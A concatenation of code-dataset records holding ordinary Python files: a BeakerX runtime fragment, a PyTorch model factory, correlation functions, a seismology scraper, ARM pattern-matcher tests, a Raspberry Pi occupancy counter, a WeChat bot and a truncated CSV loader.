pandas.core.frame.DataFrame:\n out = {}\n out['type'] = \"TableDisplay\"\n out['subtype'] = \"TableDisplay\"\n out['hasIndex'] = \"true\"\n out['columnNames'] = (['Index'] if obj.index.name is None else obj.index.names) + obj.columns.tolist()\n out['indexName'] = ['index'] if (len(obj.index.names) == 1) and (\n obj.index.names[0] is None) else obj.index.names\n vals = obj.values.tolist()\n idx = obj.index.tolist()\n for x in range(0, len(vals)):\n vals[x] = [idx[x]] + vals[x]\n ty = []\n num = len(obj.columns.tolist())\n x = 0\n for x in range(0, num + 1):\n ty.append(convertTypeName(type(vals[0][x]).__name__))\n out['types'] = ty\n for x in range(0, len(vals)):\n transformNaNs(vals[x])\n out['values'] = vals\n return out\n if type(obj) == pandas.core.series.Series:\n basict = True\n for i in range(len(obj)):\n if not isPrimitiveType(type(obj[i]).__name__):\n basict = False\n break\n if basict:\n out = {}\n out['type'] = \"TableDisplay\"\n out['subtype'] = \"Dictionary\"\n out['columnNames'] = [\"Index\", \"Value\"]\n values = []\n for k, v in obj.items():\n values.append([k, transform(v)])\n out['values'] = values\n return out\n return obj.to_dict()\n if type(obj).__name__ == 'Timedelta' or type(obj).__name__ == 'TimedeltaIndex':\n return\n return json.JSONEncoder.default(self, obj)\n\n\nclass MyJSONFormatter(IPython.core.formatters.BaseFormatter):\n format_type = Unicode('application/json')\n\n def __call__(self, obj):\n try:\n obj = transform(obj)\n return json.dumps(obj, cls=DataFrameEncoder)\n except Exception as e:\n # print(e)\n # traceback.print_exc()\n return None\n\n\nfrom .beakerx_server import BeakerxZMQServer\nfrom queue import Queue\n\n\nclass BeakerX:\n\n def __init__(self):\n self._comm = None\n self._queue = Queue()\n self._server = BeakerxZMQServer(self._queue)\n self._url = self._server.url\n if BeakerXTabledisplay is not None:\n BeakerXTabledisplay.pandas_display_table()\n\n @staticmethod\n def pandas_display_default():\n pandas.DataFrame._ipython_display_ = None\n\n @staticmethod\n def pandas_display_table():\n if BeakerXTabledisplay is not None:\n BeakerXTabledisplay.pandas_display_table()\n else:\n html = BeakerxHTML()\n html.value = 'You need beakerx_tabledisplay to use this'\n IPython.display.display_html(html)\n\n def set4(self, var, val, unset, sync):\n args = {'name': var, 'sync': sync}\n if not unset:\n val = transform(val)\n args['value'] = json.dumps(val, cls=DataFrameEncoder)\n state = {'state': args}\n if self._comm is None:\n self.init_autotranslation_comm()\n self._comm.send(data=state)\n\n def init_autotranslation_comm(self):\n self._comm = Comm(target_name='beakerx.autotranslation')\n self._comm.open()\n\n def get(self, var):\n result = autotranslation_get(var)\n if result == 'undefined':\n raise NameError('name \\'' + var + '\\' is not defined on the beakerx object')\n return transformBack(json.loads(result))\n\n def set_session(self, id):\n self.session_id = id\n\n def register_output(self):\n ip = IPython.InteractiveShell.instance()\n ip.display_formatter.formatters['application/json'] = MyJSONFormatter(parent=ip.display_formatter)\n\n def set(self, var, val):\n autotranslation_update(var, val)\n return self.set4(var, val, False, True)\n\n def unset(self, var):\n return self.set4(var, None, True, True)\n\n def isDefined(self, var):\n return autotranslation_get(var) != 'undefined'\n\n def createOutputContainer(self):\n return OutputContainer()\n\n def showProgressUpdate(self):\n return \"WARNING: python3 language plugin does not support progress updates\"\n\n def evaluate(self, filter):\n args = {'filter': filter, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/evaluate',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = json.loads(conn.read().decode())\n return transformBack(result)\n\n def evaluateCode(self, evaluator, code):\n args = {'evaluator': evaluator, 'code': code, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/evaluateCode',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = json.loads(conn.read().decode())\n return transformBack(result)\n\n def showStatus(self, msg):\n args = {'msg': msg, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/showStatus',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = conn.read()\n return result == \"true\"\n\n def clearStatus(self, msg):\n args = {'msg': msg, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/clearStatus',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = conn.read()\n return result == \"true\"\n\n def showTransientStatus(self, msg):\n args = {'msg': msg, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/showTransientStatus',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = conn.read()\n return result == \"true\"\n\n def getEvaluators(self):\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/getEvaluators?' +\n urllib.parse.urlencode({\n 'session': self.session_id}))\n conn = self._beaker_url_opener.open(req)\n result = json.loads(conn.read().decode())\n return transformBack(result)\n\n def getVersion(self):\n req = urllib.request.Request(\n self.core_url + '/rest/util/version?' + urllib.parse.urlencode({'session': self.session_id}))\n conn = self._beaker_url_opener.open(req)\n return transformBack(conn.read().decode())\n\n def getVersionNumber(self):\n req = urllib.request.Request(\n self.core_url + '/rest/util/getVersionInfo?' + urllib.parse.urlencode({'session': self.session_id}))\n conn = self._beaker_url_opener.open(req)\n result = json.loads(conn.read().decode())\n return transformBack(result['version'])\n\n def getCodeCells(self, filter):\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/getCodeCells?' +\n urllib.parse.urlencode({\n 'filter': filter}))\n conn = self._beaker_url_opener.open(req)\n result = json.loads(conn.read().decode())\n return transformBack(result)\n\n def setCodeCellBody(self, name, body):\n args = {'name': name, 'body': body, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/setCodeCellBody',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = conn.read()\n return result == \"true\"\n\n def setCodeCellEvaluator(self, name, evaluator):\n args = {'name': name, 'evaluator': evaluator, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/setCodeCellEvaluator',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = conn.read()\n return result == \"true\"\n\n def setCodeCellTags(self, name, tags):\n args = {'name': name, 'tags': tags, 'session': self.session_id}\n req = urllib.request.Request(self.core_url + '/rest/notebookctrl/setCodeCellTags',\n urllib.parse.urlencode(args).encode('utf8'))\n conn = self._beaker_url_opener.open(req)\n result = conn.read()\n return result == \"true\"\n\n def runByTag(self, tag):\n arguments = dict(target_name='beakerx.tag.run')\n comm = Comm(**arguments)\n msg = {'runByTag': tag}\n state = {'state': msg}\n comm.send(data=state, buffers=[])\n\n def urlArg(self, argName):\n arguments = dict(target_name='beakerx.geturlarg')\n comm = Comm(**arguments)\n state = {\n 'name': 'URL_ARG',\n 'arg_name': argName\n }\n data = {\n 'state': state,\n 'url': self._url,\n 'type': 'python'\n }\n\n comm.send(data=data, buffers=[])\n data = self._queue.get()\n params = json.loads(data)\n return params['argValue']\n\n def __setattr__(self, name, value):\n if 'session_id' == name:\n self.__dict__['session_id'] = value\n return\n if '_comm' == name:\n self.__dict__['_comm'] = value\n return\n if '_url' == name:\n self.__dict__['_url'] = value\n return\n if '_queue' == name:\n self.__dict__['_queue'] = value\n return\n if '_server' == name:\n self.__dict__['_server'] = value\n return\n return self.set(name, value)\n\n def __getattr__(self, name):\n if '_comm' == name:\n return self.__dict__['_comm']\n if '_url' == name:\n return self.__dict__['_url']\n if '_queue' == name:\n return self.__dict__['_queue']\n if '_server' == name:\n return self.__dict__['_server']\n return self.get(name)\n\n def __contains__(self, name):\n return self.isDefined(name)\n\n def __delattr__(self, name):\n return self.unset(name)\n\n\ndef autotranslation_update(var, val):\n session_id = get_context_session()\n port = os.environ[\"BEAKERX_AUTOTRANSLATION_PORT\"]\n url = 'http://localhost:{0}/autotranslation/'.format(port)\n json_data = json.dumps(transform(val), cls=DataFrameEncoder)\n data = {}\n data[\"name\"] = var\n data[\"json\"] = json_data\n data[\"sessionId\"] = session_id\n requests.post(url, data=json.dumps(data), headers={'Authorization': get_auth_token()})\n\n\ndef autotranslation_get(var):\n port = os.environ[\"BEAKERX_AUTOTRANSLATION_PORT\"]\n session_id = get_context_session()\n url = 'http://localhost:{0}/autotranslation/{1}/{2}'.format(port, session_id, var)\n result = requests.get(url, headers={'Authorization': get_auth_token()})\n return transformBack(result.content.decode())\n\n\ndef get_auth_token():\n token_string = 'beakerx:' + os.environ['BEAKERX_AUTOTRANSLATION_PASSWORD']\n return 'Basic ' + base64.b64encode(token_string.encode('utf-8')).decode()\n\n\ndef get_context_session():\n kernel = get_ipython().kernel\n # if subkernel get session from extra start parameters\n if len(kernel.parent.argv) == 3:\n context_json = base64.b64decode(kernel.parent.argv[2]).decode('UTF-8')\n return json.loads(context_json)['contextId']\n return kernel.session.session\n","repo_name":"twosigma/beakerx_widgets","sub_path":"beakerx_widgets/beakerx/runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":23975,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"15860248446","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom utils.dataloader import DataGenerator, dataset_collate\n\nfrom .architectures.alexnet import alexnet\nfrom .architectures.squeezenet import squeezenet\nfrom .architectures.shufflenet import shufflenetv2\nfrom .architectures.resnet import resnet18, resnet34, resnet50, resnet101, resnet152\nfrom .architectures.resnet import resnext50_32x4d, resnext101_32x8d\nfrom .architectures.inception import inception_v3\nfrom .architectures.googlenet import googlenet\nfrom .architectures.efficientnet import efficientnet\nfrom .architectures.mobilenet import mobilenet_v2\nfrom .architectures.senet import se_resnet50, se_resnet101, se_resnet152, se_resnet50_fc512\nfrom .architectures.senet import se_resnext50_32x4d, se_resnext101_32x4d\nfrom .architectures.vgg16 import vgg16\nfrom .architectures.densenet import densenet\nfrom .architectures.vit import vit\n\n\n\ndef get_model(net_type, input_shape, pretrained=False, output_size=2):\n if net_type == 'alexnet':\n model = alexnet(input_shape = input_shape, num_classes = output_size, pretrained = pretrained)\n elif net_type == 'squeezenet':\n model = squeezenet(input_shape = input_shape, num_classes = output_size, pretrained = pretrained)\n elif net_type == 'shufflenet':\n model = shufflenetv2(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'resnet152':\n model = resnet152(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'resnext101_32x8d':\n model = resnext101_32x8d(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'inception_v3':\n model = inception_v3(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'googlenet':\n model = googlenet(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'efficientnet':\n model = efficientnet(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'mobilenet_v2':\n model = mobilenet_v2(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'se_resnet152':\n model = se_resnet152(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'se_resnet50_fc512':\n model = se_resnet50_fc512(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'se_resnext101_32x4d':\n model = se_resnext101_32x4d(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'vgg16':\n model = vgg16(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'densenet':\n model = densenet(num_classes = output_size, pretrained = pretrained)\n elif net_type == 'vit':\n model = vit(input_shape = input_shape, num_classes = output_size, pretrained = pretrained)\n\n else:\n raise Exception('Unknown architecture type') \n \n return model \n\nclass FocalLoss(nn.Module):\n def __init__(self, gamma = 2, eps = 1e-7):\n super(FocalLoss, self).__init__()\n self.gamma = gamma\n self.eps = eps\n self.ce = nn.CrossEntropyLoss()\n\n def forward(self, input, target):\n logp = self.ce(input, target)\n p = torch.exp(-logp)\n loss = (1 - p) ** self.gamma * logp\n return loss.mean()\n \ndef init_loss(criterion_name):\n\n if criterion_name=='bce':\n loss = nn.BCEWithLogitsLoss()\n elif criterion_name=='cce':\n loss = nn.CrossEntropyLoss() \n elif criterion_name == 'focal_loss':\n loss = FocalLoss()\n else:\n raise Exception('This loss function is not implemented yet.') \n\n return loss \n\n\ndef get_optimizer(model, opt, optimizer_type): \n optimizer = {\n 'adam' : optim.Adam(model.parameters(), opt.Init_lr_fit, betas = (opt.momentum, 0.999), weight_decay = opt.weight_decay),\n 'adamw' : optim.AdamW(model.parameters(), opt.Init_lr_fit, betas = (opt.momentum, 0.999), weight_decay = opt.weight_decay),\n 'sgd' : optim.SGD(model.parameters(), opt.Init_lr_fit, momentum = opt.momentum, nesterov=True, weight_decay = opt.weight_decay)\n }[optimizer_type] \n return optimizer\n\n\ndef generate_loader(opt): \n train_dataset = DataGenerator(opt.lines[:opt.num_train], opt.input_shape, True)\n val_dataset = DataGenerator(opt.lines[opt.num_train:], opt.input_shape, False)\n\n # gen = DataLoader(train_dataset, shuffle = True, batch_size = opt.batch_size, num_workers = opt.num_workers, pin_memory=True,\n # drop_last=True, collate_fn=dataset_collate)\n # gen_val = DataLoader(val_dataset , shuffle = True, batch_size = opt.batch_size, num_workers = opt.num_workers, pin_memory=True, \n # drop_last=True, collate_fn=dataset_collate) \n\n batch_size = opt.batch_size\n if opt.distributed:\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, shuffle=True,)\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset, shuffle=False,)\n batch_size = batch_size // opt.ngpus_per_node\n shuffle = False\n else:\n train_sampler = None\n val_sampler = None\n shuffle = True\n\n gen = torch.utils.data.DataLoader(train_dataset, shuffle = shuffle, batch_size = batch_size, num_workers = opt.num_workers, pin_memory=True,\n drop_last=True, collate_fn=dataset_collate, sampler=train_sampler)\n gen_val = torch.utils.data.DataLoader(val_dataset , shuffle = shuffle, batch_size = batch_size, num_workers = opt.num_workers, pin_memory=True, \n drop_last=True, collate_fn=dataset_collate, sampler=val_sampler) \n return gen, gen_val","repo_name":"Leyan529/pytorch-image-classification","sub_path":"models/init_model.py","file_name":"init_model.py","file_ext":"py","file_size_in_byte":5852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28109069215","text":"\n\"\"\"\nPearson Rho, Spearman Rho, and Kendall Tau\n\nCorrelation algorithms\n\nDrew J. Nase\n\nExpects path to a file containing data series - \none per line, separated by one or more spaces.\n\"\"\"\n\nimport math\nimport sys\nimport string\nimport json\nfrom itertools import combinations\n\n# if len(sys.argv) > 1:\n# #data file given as arg\n# filename = sys.argv[1]\n# else:\n# sys.exit(\"Usage: python \" + sys.argv[0] + \" [matrix filename]\")\n\n# x = []\n# y = []\n\n# def split_values(v):\n# buff = map(string.strip, string.split(v, \" \"))\n# x.append(float(buff[0]))\n# y.append(float(buff[1]))\n\n#x, y must be one-dimensional arrays of the same length\n\n#Pearson algorithm\ndef pearson(x, y):\n assert len(x) == len(y)\n q = lambda n: len(n) * sum(map(lambda i: i ** 2, n)) - (sum(n) ** 2)\n return (len(x) * sum(map(lambda a: a[0] * a[1], zip(x, y))) - sum(x) * sum(y)) / math.sqrt(q(x) * q(y))\n\n#Spearman algorithm\ndef spearman(x, y):\n assert len(x) == len(y)\n q = lambda n: map(lambda val: sorted(n).index(val) + 1, n)\n d = sum(map(lambda x, y: (x - y) ** 2, q(x), q(y)))\n return 1.0 - 6.0 * d / float(len(x) * (len(y) ** 2 - 1.0))\n\n#Kendall algorithm\ndef kendall(x, y):\n assert len(x) == len(y)\n c = 0 #concordant count\n d = 0 #discordant count\n t = 0 #tied count\n for (i, j) in combinations(range(len(x)), 2):\n s = (x[i] - x[j]) * (y[i] - y[j])\n if s:\n c += 1\n d += 1\n if s > 0:\n t += 1\n elif s < 0:\n t -= 1\n else:\n if x[i] - x[j]:\n c += 1\n elif y[i] - y[j]:\n d += 1\n return t / math.sqrt(c * d)\n\n\n\n\ndef sub2score(json_file):\n temp_json = {}\n for i in json_file[\"Result\"]:\n # print(f'subnet: {i[\"subnet\"]}, score: {i[\"score\"]}')\n temp_json[str(i[\"subnet\"])] = i[\"score\"]\n\n return temp_json\n\n\ndef Top_k_list(Result_dict, My_dict, K = 100):\n\n Re_num_score = {}\n Re_k_list = []\n My_k_list = []\n for num in Result_dict:\n if int(num) < 4444444:\n Re_num_score[num] = Result_dict[num][\"mean\"]\n sorted_subnet = sorted(Re_num_score.items(), key=lambda i: i[1], reverse=True)\n sorted_subnet_key = [x[0] for x in sorted_subnet]\n Result_topk = sorted_subnet_key[:K]\n for i in Result_topk:\n Re_k_list.append(Re_num_score[i])\n My_k_list.append(My_dict[i])\n \n print(f'key: {Result_topk}, Re_k_list: {Re_k_list}, My_k_list: {My_k_list}')\n\n return Re_k_list, My_k_list\n\n\n\n\n\n\n\n\n\n\nMy_results = \"json_results/bin20_min1_bcnet_3_resnet.json\"\nRecord_results = \"json_results/record_json/Results_ResNet.json\"\n\n\nwith open(My_results,'r') as load_f:\n My_dict = json.load(load_f)\n\nwith open(Record_results,'r') as load_f:\n Re_dict = json.load(load_f)\n\nMy_temp = sub2score(My_dict)\n\n\n\n# Re_list, My_list = Top_k_list(Re_dict, My_temp, K = 100)\n\n\nMy_list = []\nRe_list = []\n\nfor num in Re_dict:\n if int(num) < 4444444:\n if '1' not in num:\n Re_list.append(Re_dict[num][\"mean\"])\n My_list.append(My_temp[num])\n\n\nprint('Pearson Rho: %f' % pearson(My_list, Re_list))\n\nprint('Spearman Rho: %f' % spearman(My_list, Re_list))\n\nprint('Kendall Tau: %f' % kendall(My_list, Re_list))","repo_name":"simrit1/BCNetV2","sub_path":"BCNetV2/example/classification/pearson_kendall_spearman.py","file_name":"pearson_kendall_spearman.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"20709987490","text":"import geopy\nfrom geopy.distance import geodesic\nfrom unittest import result\nfrom bs4 import BeautifulSoup\nimport requests\nfrom datetime import datetime\nimport urllib.request\nimport pandas as pd\n\ntiempo = datetime.today().strftime('%Y/%m/%Y%m%d')\n\ne = urllib.request.urlopen(f\"http://www.sismologia.cl/sismicidad/catalogo/{tiempo}.html\").read()\nsoup = BeautifulSoup(e, 'html.parser')\n\n\n # Obtenemos la tabla\n\ntabla_sismos = soup.find('table', attrs={'class':'sismologia detalle'})\n\n# Obtenemos todas las filass\nrows = tabla_sismos.find_all('tr')\n\n# output_data = []\n# for row in rows:\n# cells = row.find_all('th')\n# output_dat = []\n# if len(cells) > 0:\n# for cell in cells:\n# output_data.append(cell.text)\n# output_data.append(output_dat)\n\n# dataset = pd.DataFrame(output_data)\n\ndelimiter = \",\" # unambiguous string\nfor line_break in soup.findAll('br'): # loop through line break tags\n line_break.replaceWith(delimiter) # replace br tags with delimiter\nstrings = soup.get_text().split(delimiter) # get list of strings\n\noutput_rows = []\nfor row in rows:\n # obtenemos todas las columns\n cells = row.find_all(\"td\")\n output_row = []\n if len(cells) > 0:\n for cell in cells:\n output_row.append(cell.get_text())\n output_rows.append(output_row)\n\ndataset = pd.DataFrame(output_rows).drop_duplicates()\n\n\ndataset.columns = [\n \"Fecha Local / Lugar\",\n \"Fecha UTC\",\n \"Latitud / Longitud\",\n \"Profundidad\",\n \"Magnitud (2)\",\n ]\n\n# dataset[[\"Fecha Local / Lugar\"]] = dataset[[\"Fecha Local / Lugar\"]].astype(str)\n\n# dataset[\"Fecha Local / Lugar\"].str.replace(\" \",\"\", 1)\n\n\ndataset[[\"Fecha Local\", \"Lugar\"]] = dataset[\"Fecha Local / Lugar\"].str.split(r\",\", expand=True)\n\ndataset[[\"Latitud\", \"Longitud\"]] = dataset[\"Latitud / Longitud\"].str.split(r\",\", expand=True)\n\ndataset[[\"Latitud\", \"Longitud\"]] = dataset[[\"Latitud\", \"Longitud\"]].apply(pd.to_numeric)\n\ndataset_filter = dataset[\n (-27.100 <= dataset[\"Latitud\"])\n & (dataset[\"Latitud\"] <= -21.680)\n & (-72.150 <= dataset[\"Longitud\"])\n & (dataset[\"Longitud\"] <= -66.180)\n ]\n\n\n\ntranque = (-24.39,-69.14)\n\nlatitud1 = dataset_filter['Latitud'].values[0]\nlongitud1 = dataset_filter['Longitud'].values[0]\nprofundidad = dataset_filter['Profundidad'].values[0]\nmagnitud = dataset_filter['Magnitud (2)'].values[0]\nmagnitud2 = magnitud.split(' ')\nmagnitud3 = float(magnitud2[0])\nmagnitud4 = magnitud2[1]\ndelhi = (latitud1, longitud1)\ndistancia = int(round((geodesic(tranque, delhi).km)))\n\nprint (magnitud3)\nprint (distancia)\n\n# dataset.to_excel(\"test.xlsx\")\n# dataset[[\"Fecha Local\", \"Lugar\"]] = dataset[\"Fecha Local / Lugar\"].str.replace(\" \",\"\", 1)\n\ndataset_filter.to_excel(\"test.xlsx\")\n\n# dataset[[\"Latitud\", \"Longitud\"]] = dataset[[\"Latitud\", \"Longitud\"]].apply(pd.to_numeric)\n# dataset_filter = dataset[\n# (-27.100 <= dataset[\"Latitud\"])\n# & (dataset[\"Latitud\"] <= -21.680)\n# & (-72.150 <= dataset[\"Longitud\"])\n# & (dataset[\"Longitud\"] <= -66.180)\n# ]\n\nprint (dataset_filter)\n","repo_name":"brunooviedo/test","sub_path":"test_bk.py","file_name":"test_bk.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"20938957774","text":"from unittest import TestCase\r\n\r\nimport lark.exceptions\r\nimport pytest\r\n\r\nfrom parm import parsers\r\nfrom parm.api.parsing import arm_pat\r\nfrom parm.api.parsing import arm_asm\r\n\r\nfrom parm.api.parsing.arm_pat import BlockPat, CommandPat, InstructionPat, OperandsPat, OpcodePat, RegPat\r\nfrom parm.api.parsing.arm_pat import AddressPat, WildcardSingle, Label, PythonCodeLine, PythonCodeLines\r\nfrom parm.api.parsing.arm_pat import DataSeq, DataByte, DataWord\r\n\r\nfrom parm.api.match_result import MatchResult\r\nfrom parm.programs.snippet import ArmSnippetProgram\r\n\r\n\r\nclass ArmPatternTest(TestCase):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n self.program = ArmSnippetProgram()\r\n self.arm_pat_parser = parsers.create_arm_pattern_parser()\r\n self.arm_parser = parsers.create_arm_parser()\r\n self.arm_pat_transformer = arm_pat.ArmPatternTransformer()\r\n self.arm_transformer = arm_asm.ArmTransformer()\r\n\r\n def create_pattern(self, pattern):\r\n return self.program.create_pattern(pattern)\r\n\r\n def match_pattern(self, pattern, code):\r\n cursor = self.program.add_code_block(code)\r\n pat = self.create_pattern(pattern)\r\n mr = MatchResult()\r\n cursor.match(pat, mr)\r\n return mr\r\n\r\n def test_blx_tree(self):\r\n expected = BlockPat([CommandPat(InstructionPat(OpcodePat('blx*'), OperandsPat([RegPat(arm_pat.Reg('r0'))])))])\r\n assert self.create_pattern('blx* r0') == expected\r\n\r\n def test_bl_tree(self):\r\n expected = BlockPat([\r\n AddressPat(Label('test')),\r\n CommandPat(InstructionPat(OpcodePat('bl'), OperandsPat([AddressPat(WildcardSingle('test'))])))\r\n ])\r\n pat = self.create_pattern('test: bl @:test')\r\n assert pat == expected\r\n\r\n def test_python_pattern(self):\r\n expected = BlockPat([CommandPat(PythonCodeLine(\r\n [\"match_single(xrefs_to, 'MOV R1, R2')\"]\r\n ))])\r\n\r\n pat = self.create_pattern(\"\"\"\r\n % match_single(xrefs_to, 'MOV R1, R2')\r\n \"\"\")\r\n assert pat == expected\r\n\r\n def test_continued_python_pattern(self):\r\n # Test line continuation using \"\\\"\r\n expected = BlockPat([CommandPat(PythonCodeLine(\r\n [\"a = [1, 2, \\\\\\n 3]\"]\r\n ))])\r\n pat = self.create_pattern(\"\"\"\r\n % a = [1, 2, \\\\\r\n 3]\r\n \"\"\")\r\n assert pat == expected\r\n\r\n # Only a newline may occur after a \"\\\"\r\n with pytest.raises(lark.exceptions.UnexpectedCharacters):\r\n self.create_pattern(\"\"\"\r\n % a = [1, 2, \\\\ # comment\r\n 3]\r\n \"\"\")\r\n\r\n # Test line continuation when in square brackets\r\n expected = BlockPat([CommandPat(PythonCodeLine(\r\n [\"a = [1, 2,\\n 3]\"]\r\n ))])\r\n pat = self.create_pattern(\"\"\"\r\n % a = [1, 2,\r\n 3]\r\n \"\"\")\r\n assert pat == expected\r\n\r\n # Without \"\\\", the line is finished...\r\n with pytest.raises(lark.exceptions.UnexpectedCharacters):\r\n self.create_pattern(\"\"\"\r\n % a = \"test\"\r\n \"test\"\r\n \"\"\")\r\n\r\n # Test line continuation when in parentheses\r\n expected = BlockPat([CommandPat(PythonCodeLine(\r\n ['a = (\"test\"\\n \"test\")']\r\n ))])\r\n pat = self.create_pattern(\"\"\"\r\n % a = (\"test\"\r\n \"test\")\r\n \"\"\")\r\n assert pat == expected\r\n\r\n def test_multiline_python_pattern(self):\r\n expected = BlockPat([CommandPat(PythonCodeLines(\r\n [\" p = pat('MOV R1, R2')\", \" match_single(xrefs_to, p)\"]\r\n ))])\r\n\r\n pat = self.create_pattern(\"\"\"\r\n %%\r\n p = pat('MOV R1, R2')\r\n match_single(xrefs_to, p)\r\n %%\r\n \"\"\")\r\n assert pat == expected\r\n\r\n def test_db(self):\r\n expected = BlockPat([DataSeq([DataByte(0x10)])])\r\n pat = self.create_pattern('.db 0x10')\r\n assert pat == expected\r\n\r\n def test_anchor(self):\r\n block = BlockPat([DataSeq([DataByte(0x10)]), DataSeq([DataWord(0x200)])])\r\n pat = self.create_pattern(\"\"\"\r\n .db 0x10\r\n > .dw 0x200\r\n \"\"\")\r\n assert pat != block\r\n\r\n block.anchor_index = 1\r\n block.relink_lines()\r\n\r\n assert pat == block\r\n\r\n def test_match_mov(self):\r\n asm = 'mov r0, r1'\r\n pat = 'mov @:reg, r1'\r\n result = self.match_pattern(pat, asm)\r\n assert result['reg'].name == 'r0'\r\n\r\n def test_match_push(self):\r\n asm = 'push {r0, r1}'\r\n pat = 'push {*:regs}'\r\n result = self.match_pattern(pat, asm)\r\n assert result['regs'] == [arm_asm.Reg('r0'), arm_asm.Reg('r1')]\r\n","repo_name":"chananele/parm","sub_path":"parm/tests/arm_pat_test.py","file_name":"arm_pat_test.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"29338116842","text":"import RPi.GPIO as GPIO\nimport time\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(10, GPIO.IN)\nGPIO.setup(4, GPIO.IN)\n\n#Upon entering, beam 1 is broken before beam 2\n\nfirst = False\nsecond = False\ndirection = \"empty\"\ncount = 0\n\nwhile True:\n if GPIO.input(4) == 0:\n first = True\n direction = \"exit\"\n if GPIO.input(10) == 0:\n second = True\n direction = \"enter\"\n if first and second:\n if direction == \"enter\":\n count = count + 1\n print(\"One person entered. Occupancy is \" + str(count))\n if direction == \"exit\":\n if count > 0:\n count = count - 1\n print(\"One person exited. Occupancy is \" + str(count))\n else:\n print(\"One person exited. Occupancy is \" + str(count))\n first = False\n second = False\n time.sleep(0.5)","repo_name":"spjones97/HackNC","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26296940131","text":"from wxpy import *\n\nimport time,datetime\n\nfrom threading import Thread \nbot=Bot(cache_path=True)\n\n\n####        测试代码\n###################################################################################\n\n\n# 机器人账号自身\nmyself = bot.self\n\nprint(\"机器人自身:\",myself)\n\nallfriends = bot.friends()\n\nprint(\"机器人的所有好友:\",allfriends)\n\nallgroups = bot.chats(update=False)\n## 打印的是所有的微信的聊天对象\nprint(\"机器人的聊天对象:\",allgroups)\n\n\n\n#####################################################################################\n\n\n\n\n\n\nfriend = bot.friends().search('liyuan')[0]\nprint(friend)\n\nmessage = '这是message消息'\n# 功能一 :自动回复微信消息\n@bot.register() # 接收从指定好友发来的消息,发送者即recv_msg.sender为指定好友girl_friend\ndef recv_send_msg(recv_msg):\n #业务逻辑代码\n # 附加功能:增加消息记录的功能\n print('收到的消息:',recv_msg.text) # recv_msg.text取得文本\n if recv_msg.text == '1':\n return '1111111111111'\n elif recv_msg.text == '2':\n return '22222222222'\n return '您好,一个微信机器人,按1,按2试试'\n\n\n# 功能二 :主动推送消息给一些人\ndef putmsg(friend,message):\n friend.send(message)\n\n# 功能三 :定时的自动向目标群(好友)推送消息\ndef run(h,m):\n while True:\n now = datetime.datetime.now()\n print(now.hour,now.minute)\n if now.hour in h and now.minute in m:\n putmsg(friend,message)\n time.sleep(60)\n\n# run函数为定时启动的函数\n# run(23,m=[24])\n# 开辟一个新的进程对新的\n#p = Process(target = run,kwargs = {'h':22,'m':[50,51,52]})\np = Thread(target = run,kwargs = {'h':[23],'m':[8,9,10,11,12]})\np.start()\n#p.join()\n# 功能三:主动推送消息给一些人\n\n\n# 阻塞等待微信机器人的消息\n\nbot.join()","repo_name":"liyuan3970/study_demo","sub_path":"wx_py/wx_demo1.py","file_name":"wx_demo1.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"29152517697","text":"\"\"\"\nScript que carrega os dados de pedidos de um arquivo .csv e salva nas tabelas tb_pedidos e tb_produtos_pedidos\n\"\"\"\n\nimport csv\nimport os\n\nfrom datetime import datetime\n\nfrom config import sessao\nfrom models import Pedido, Produto, Usuario, ProdutoPedido\n\nif __name__ == \"__main__\":\n\n try:\n nome_arquivo = input(\"Informe o nome do arquivo de pedidos(ENTER para carregar o 